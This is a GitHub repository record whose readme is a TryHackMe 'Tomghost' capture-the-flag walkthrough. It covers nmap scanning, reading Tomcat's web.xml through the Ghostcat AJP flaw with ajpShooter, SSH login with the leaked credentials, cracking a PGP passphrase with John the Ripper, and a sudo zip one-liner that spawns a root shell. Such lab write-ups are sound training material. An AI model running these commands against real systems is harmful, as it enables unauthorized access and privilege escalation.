{"id":21897301,"url":"https://github.com/ccrashzer0/tomghost","last_synced_at":"2026-02-11T07:32:02.804Z","repository":{"id":247459998,"uuid":"275051370","full_name":"CCrashZer0/TomGhost","owner":"CCrashZer0","description":"Try Hack Me - TomGhost Write Up","archived":false,"fork":false,"pushed_at":"2020-07-06T01:34:25.000Z","size":615,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"master","last_synced_at":"2025-09-03T10:39:08.016Z","etag":null,"topics":["ctf","ctf-writeups","cybersecurity","hacking","infosec","learning-by-doing","learning-exercise","tryhackme","tutorial","tutorial-exercises"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/CCrashZer0.png","metadata":{"files":{"readme":"ReadMe.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-06-26T01:43:36.000Z","updated_at":"2023-04-11T15:30:21.000Z","dependencies_parsed_at":"2024-07-08T23:17:26.103Z","dependency_job_id":"dce73f5e-856a-435d-879c-a585adbd9850","html_url":"https://github.com/CCrashZer0/TomGhost","commit_stats":null,"previous_names":["ccrashzer0/tomghost"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/CCrashZer0/TomGhost","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts
/GitHub/repositories/CCrashZer0%2FTomGhost/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/CCrashZer0","download_url":"https://codeload.github.com/CCrashZer0/TomGhost/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/CCrashZer0%2FTomGhost/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29329493,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T06:13:03.264Z","status":"ssl_error","status_checked_at":"2026-02-11T06:12:55.843Z","response_time":97,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ctf","ctf-writeups","cybersecurity","hacking","infosec","learning-by-doing","learning-exercise","tryhackme","tutorial","tutorial-exercises"],"created_at":"2024-11-28T14:16:53.649Z","updated_at":"2026-02-11T07:32:02.786Z","avatar_url":"https://github.com/CCrashZer0.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Try Hack Me - Tomghost\n\nIdentify recent vulnerabilities to try to exploit the system or read files that you should not have access to. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.\n\n## Disclaimer - Your IP address will be different!\n---\n\n## Scanning and Enumeration\n\nWe will start with running our nmap scan.  
\nCommand: `nmap -A -T4 -sC -sV -oN nmap/initial.txt 10.10.93.77`\n\nCommand Breakdown:\n\n    -A: do an extensive scan on these ports\n\n    -T4: speed of nmap scan is 4/5 (personal preference of mine)\n\n    -sC: Scan with default NSE scripts. Considered useful for discovery and safe\n\n    -sV: Attempts to determine the version of the service running on port\n\n    -oN: Normal output to the file normal.file\n\nOnce the results came back there was only one thing that appeared out of place to me, and that was port 8009.  \n\nBy default, Apache Tomcat listens on 3 ports: 8005, 8009 and 8080. A common misconfiguration is blocking port 8080 but leaving ports 8005 or 8009 open for public access.  \n\n![nmapResults](images/nmapresults.png \"NMAP\")\n\nWe will be using the following tool to exploit this vulnerability.  \n[00theway/Ghostcat-CNVD-2020-10487](https://github.com/00theway/Ghostcat-CNVD-2020-10487)  \n\nCommand: `python3 ajpShooter.py http://10.10.93.77:8080 8009 /WEB-INF/web.xml read`\n\n![ajpShooterResults](images/ajpShooter.png \"ajpShooter\") \n\nIt would seem that we were able to find what looks like both a user name and a password.  \n\nLet's look back at our nmap scan. Remember that port 22 was open. We might be able to use these credentials to log into our box.  \n\nCommand: `ssh \u003cusername\u003e@10.10.93.77`  \nEnter the password when you are prompted to and BLAM! We are connected under that user account.  \n\n![sfUser](images/sfUser.png \"sfUser\")  \nWhen we use the `ls` command we see that there are two files. Both of these files could be encryption keys, but for right now we are going to look into the `/home` directory to see if we can find anything useful.  \n\n![merlin](images/merlin.png \"merlin\")  \nLet's keep digging and see if we can find anything else. If we `ls /home/merlin` you will see that it is here we find our first flag `user.txt`.  
\n\n![userFlag](images/userFlag.png \"userFlag\")  \n\nNow we are going to return to the pgp and asc files that we found in the `skyfuck` directory.  \nWe are going to copy all of these files to our host machine. In order to do this we will need to use the `scp` command.  \n\nWhen using the `scp` command you will want to run it on your host machine and not from the Tomghost VM.   \nCommand: `scp skyfuck@10.10.31.90:/home/skyfuck/* .`\n## Cracking the Hash\n---\nAfter running the `scp` command we now have both credential.pgp and tryhackme.asc on our host machine.  \nThe next thing we want to do is use John The Ripper to get the hash from `tryhackme.asc`.  \nHere is a good [video](https://www.youtube.com/watch?v=DBpd9e4tJfg) for recovering your PGP key with John.  \nCommand: `gpg2john tryhackme.asc \u003e hash`  \nOnce complete you can see that we now have our password. Let's make sure that we take note of that.  \n \nIt is now time to crack open the hash that we collected earlier. This can be done by using John and combining it with the rockyou.txt wordlist.  \n\nFYI, in order to find the location of your rockyou.txt wordlist just use `locate rockyou.txt`. Mine is located in the `/usr/share/wordlists/` directory.  \n\nCommand: `john --wordlist=/usr/share/wordlists/rockyou.txt hash`\n![passwd](images/passwd.png \"passwd\") \n\nIt seems that John was able to find our passphrase. Now we are going to use that phrase to import and decrypt the PGP key that we have.\n```\ngpg --import tryhackme.asc\ngpg --decrypt credential.pgp\n```\n\n![merlinPasswd](images/merlinPasswd.png \"merlinPasswd\")  \nThings are starting to work in our favor.\nWe now have the password to the Merlin account.  \nSo we need to go back to our SSH shell and change from the skyfuck user to merlin; that can be done by using the `su` command.  \n\nCommand: `su merlin`  \nOnce you are logged in as Merlin, let's see if we have the ability to run anything as sudo.  
\n`sudo -l`  \nIt seems that the only thing we can use sudo on is `/usr/bin/zip`.  \nAfter a little bit of research I found this [GitBook](https://d00mfist1.gitbooks.io/ctf/privilege_escalation_-_linux.html) on privilege escalation. Under the zip portion there was this one-liner that would allow us to gain access to a root shell.\n`sudo zip -q /tmp/test.zip cc0.txt -T -TT '/bin/sh #'`\n\n![shell](images/shell.png \"shell\")  \nOnce we have the shell we can use the `id` command to see that we are now running as the root user.  \n\nNow it is time to find the root.txt file.\n```\nls /root\ncat /root/root.txt\n```\n![rootFlag](images/rootFlag.png \"rootFlag\") \n\n# Congratulations, you have just completed the Tomghost challenge!","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fccrashzer0%2Ftomghost","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fccrashzer0%2Ftomghost","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fccrashzer0%2Ftomghost/lists"}